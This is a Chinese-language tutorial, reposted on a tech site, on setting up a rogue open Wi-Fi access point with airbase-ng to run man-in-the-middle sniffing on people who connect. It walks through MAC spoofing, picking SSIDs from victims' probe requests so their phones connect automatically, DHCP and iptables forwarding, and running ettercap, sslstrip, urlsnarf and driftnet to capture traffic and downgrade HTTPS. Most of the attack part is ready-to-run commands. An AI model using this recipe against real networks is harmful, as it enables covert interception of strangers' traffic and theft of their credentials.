溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

airbase-ng如何建立SoftAP進(jìn)行嗅探

發(fā)布時(shí)間:2021-11-23 09:11:52 來源:億速云 閱讀:146 作者:小新 欄目:安全技術(shù)

這篇文章主要介紹了airbase-ng如何建立SoftAP進(jìn)行嗅探,具有一定借鑒價(jià)值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。

   利用airbase-ng建立Soft AP,再利用一些常見工具進(jìn)行嗅探,或?qū)ψグM(jìn)行分析是出現(xiàn)比較早的一種MITM***方法。網(wǎng)上有很多關(guān)于手動(dòng)實(shí)現(xiàn)的文章,也有一些自動(dòng)實(shí)現(xiàn)腳本。這些腳本通常分兩類,一類是一步一步讓用戶輸入接口、選項(xiàng)什么的,最后再運(yùn)行,每一次啟動(dòng)都要重復(fù)輸入很多數(shù)據(jù),低效且不爽。第二類是自動(dòng)運(yùn)行的,但可選項(xiàng)比較少,不符合自己的使用習(xí)慣。所以,在學(xué)習(xí)過程中自己寫了一個(gè)自動(dòng)實(shí)現(xiàn)腳本。

   建立Soft AP可使用airbase-ng和hostapd,其中前者需要網(wǎng)卡支持monitor模式,是比較常用的工具,但僅支持OPN和WEP的,不支持WPA加密,不挑網(wǎng)卡,常見的RTL8187L既可。第二個(gè)是hostapd,需要網(wǎng)卡支持AP模式,8187L就用不了了,rt3070可以使用,支持建立OPN/WEP/WPA各種SoftAP。本文介紹基于airbase-ng的實(shí)現(xiàn),畢竟這是個(gè)輕量級(jí)且各種hack可選項(xiàng)較多的常用工具。

   建立soft Ap并進(jìn)行嗅探,主要有如下4步:

   1.airbase-ng建立熱點(diǎn)

   2.dhcpd啟動(dòng)dhcp服務(wù)

   3.iptables設(shè)置好轉(zhuǎn)發(fā)規(guī)則,使接入Soft AP客戶的數(shù)據(jù)可正常訪問互聯(lián)網(wǎng)

   4.啟動(dòng)嗅探工具收集信息

   結(jié)束后,還可以對(duì)抓取的包進(jìn)行后續(xù)分析。當(dāng)然,中間還可以進(jìn)行DNS劫持,偽造頁(yè)面進(jìn)行釣魚,不在本文討論范圍。下面分步說。

準(zhǔn)備工作:

  (1) 一臺(tái)電力比較持久的筆記本電腦,可以直接安裝kali linux,也可以在VMware中安裝kali。

  (2)一塊8187L網(wǎng)卡,山寨的就可以,性價(jià)比高,做工沒看出來比原裝的差在哪兒,只要保證中間芯片是真的就行。(下面照片中是原裝的)

  (3)天線:感覺7dbi的全向天線高度正好,再大就不方便了,而且9dbi的信號(hào)并未增強(qiáng)多少,反而損耗更大。方向性天線也不錯(cuò),7db方向性天線體積很小巧,據(jù)說明在聚焦方向上可達(dá)10dbi全向天線的作用距離,用于室內(nèi)空間較狹長(zhǎng)時(shí)合適。穿墻能力就不說了,鋼筋混凝土墻兩堵,基本就很難接收可用信號(hào)了。

   實(shí)測(cè)7dbi全向天線信號(hào)強(qiáng)度(無(wú)遮擋):65米處,-85dbm,50米處約-75dbm,10米之內(nèi)信號(hào)穩(wěn)定在-35dbm左右。該值非常粗略,僅供參考。一般能夠正常通信的下限是-90dbm,上網(wǎng)的話要求更高。當(dāng)然,信號(hào)強(qiáng)度也和接收裝置的天線有關(guān),不過總體上說,8187L加上7dbi的兩種天線基本夠用了,覆蓋一個(gè)公共場(chǎng)所不大室內(nèi)空間沒問題。

airbase-ng如何建立SoftAP進(jìn)行嗅探

   (4)筆記本有internet網(wǎng)接入,用于將Fake AP接收的信息轉(zhuǎn)到internet上去,不多贅述。

   (5)啟動(dòng)monitor模式,并偽造一下本機(jī)的網(wǎng)卡地址

airmon-ng start wlan1
ifconfig wlan1 down
macchanger –r wlan1
ifconfig wlan1 up
ifconfig mon0 down
macchanger –r mon0
ifconfig mon0 up

一、使用airbase-ng建立OPN的Soft AP

   airbase-ng主要用于建立OPN的AP,也就是不需要密碼的公開AP。WEP加密的已經(jīng)很少見了,不支持WPA加密。這一步中,最關(guān)鍵的是AP的ssid,ssid決定了AP欺騙性,也就是被連接的可能性。現(xiàn)在手機(jī)、平板電腦的客戶端會(huì)自動(dòng)記錄連接過的AP信息,保存在/data/misc/wifi/wpa_suppliant.conf中,每個(gè)熱點(diǎn)保存四個(gè)信息:ssid、psk(密碼)、key_mgmt(加密方式)、priority(優(yōu)先級(jí))。注意,其中不含網(wǎng)卡的硬件地址.所以,只需前三項(xiàng)對(duì)上,便可自動(dòng)連接。

   手機(jī)wifi功能打開時(shí),會(huì)不斷向外發(fā)送probe信息包,里面包含ssid??捎胊irodump-ng查看當(dāng)前網(wǎng)絡(luò)環(huán)境下有哪些被probe的ssid,供偽造ssid時(shí)參考。

   選定名稱后,便可使用airbase-ng建立Fake AP了:

airbase-ng $FAKE_AP_INTERFACE -e $FAKE_AP_ESSID -c


   airbase-ng運(yùn)行成功后,ifconfig查看,會(huì)多出一個(gè)at0接口。

root@mKL:~# ifconfig
at0       Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx
inet addr:10.0.0.1  Bcast:10.0.0.255  Mask:255.255.255.0
…
eth0      Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx 
inet addr:10.10.10.138  Bcast:10.10.10.255  Mask:255.255.255.0
…

二、使用dhcpd啟動(dòng)dhcp服務(wù)

   客戶端連接上SoftAP后,要給他們分配IP地址。這里有一條最關(guān)鍵,就是SoftAP的IP地址和Internet接口的IP地址不能在網(wǎng)一個(gè)段。比如,連接Internet網(wǎng)的網(wǎng)卡eth0,地址是10.10.10.138/24,則at0的地址后面不能設(shè)置為同一網(wǎng)段,這里設(shè)置為10.0.0.1/24。

   首先建立dhcpd.conf,內(nèi)容包含dhcp服務(wù)運(yùn)行的設(shè)置參數(shù),關(guān)鍵代碼如下:

echo -n "[+]now creating dhcpd.conf..."
cat >$SESSION_PATH/dhcpd.conf<<-EOF
authoritative;
default-lease-time 6000;
max-lease-time 12000;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.30 10.0.0.60;
option routers 10.0.0.1;
option broadcast-address 10.0.0.255;
option subnet-mask 255.255.255.0;
option domain-name-servers 8.8.8.8;
allow unknown-clients;
}
EOF
echo "done"

   這些選項(xiàng)的意義就不一一介紹了,比較重要的時(shí)option routers,網(wǎng)關(guān)的設(shè)置,后續(xù)at0的地址要設(shè)置為該網(wǎng)關(guān)地址。option domain-name-servers,設(shè)置DNS服務(wù)器地址,8.8.8.8是比較通用的值。

   接下來然后需要將SoftAP的接口,也就是airbase-ng創(chuàng)建的at0設(shè)置為該網(wǎng)段的網(wǎng)關(guān):

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

 接著啟動(dòng)dhcp服務(wù)

dhcpd -d -f -cf $SESSION_PATH/dhcpd.conf at0

三、使用iptables設(shè)置轉(zhuǎn)發(fā)

   使用iptables設(shè)置轉(zhuǎn)發(fā),將用戶連接SoftAP后的數(shù)據(jù),轉(zhuǎn)發(fā)到internet上,是非常關(guān)鍵的一步。網(wǎng)上各種版本很多,其實(shí)最簡(jiǎn)單的實(shí)現(xiàn)就一句指令:

iptables -t nat -A POSTROUTING --out-interface $FAKE_AP_INTERNET -j MASQUERADE    #$FAKE_AP_INTERNET是外網(wǎng)接口

   注意,轉(zhuǎn)發(fā)生效需要本機(jī)開啟ip_forward功能。指令是:

echo "1" > /proc/sys/net/ipv4/ip_forward

   由于后面運(yùn)行ettercap時(shí),會(huì)將該值再次變?yōu)?,所以等ettercap運(yùn)行后再執(zhí)行上述命令。

四、運(yùn)行各種嗅探工具

   SoftAP建立并運(yùn)行dhcp服務(wù)后,客戶端就可以根據(jù)我們?cè)O(shè)定的規(guī)則連接上熱點(diǎn)并正常瀏覽網(wǎng)頁(yè),運(yùn)行各個(gè)程序了。接下來,就是針對(duì)Soft AP的接口at0,執(zhí)行各種嗅探:

ettercap -Tzq -i $FAKE_AP_AT_INTERFACE -w $SESSION_PATH/etter.pcap -L $SESSION_PATH/etter
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SSLSTRIP_PORT
sslstrip -pkf -l $SSLSTRIP_PORT -w $SESSION_PATH/sslstrip.log 2>/dev/null
urlsnarf -i $1 | grep http > $SESSION_PATH/url.txt
tail -f $SESSION_PATH/url.txt
driftnet -i $1 -d $SESSION_PATH/

    以上就是實(shí)現(xiàn)基于Soft AP的MITM***的幾個(gè)關(guān)鍵步驟。

    這里提供一個(gè)自動(dòng)執(zhí)行腳本auto_opnAP.sh,最簡(jiǎn)單的執(zhí)行命令是:

auto_opnAP.sh -e xxxx -sud -i mon0 -n eth0

   運(yùn)行界面如下圖所示:

airbase-ng如何建立SoftAP進(jìn)行嗅探

感謝你能夠認(rèn)真閱讀完這篇文章,希望小編分享的“airbase-ng如何建立SoftAP進(jìn)行嗅探”這篇文章對(duì)大家有幫助,同時(shí)也希望大家多多支持億速云,關(guān)注億速云行業(yè)資訊頻道,更多相關(guān)知識(shí)等著你來學(xué)習(xí)!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI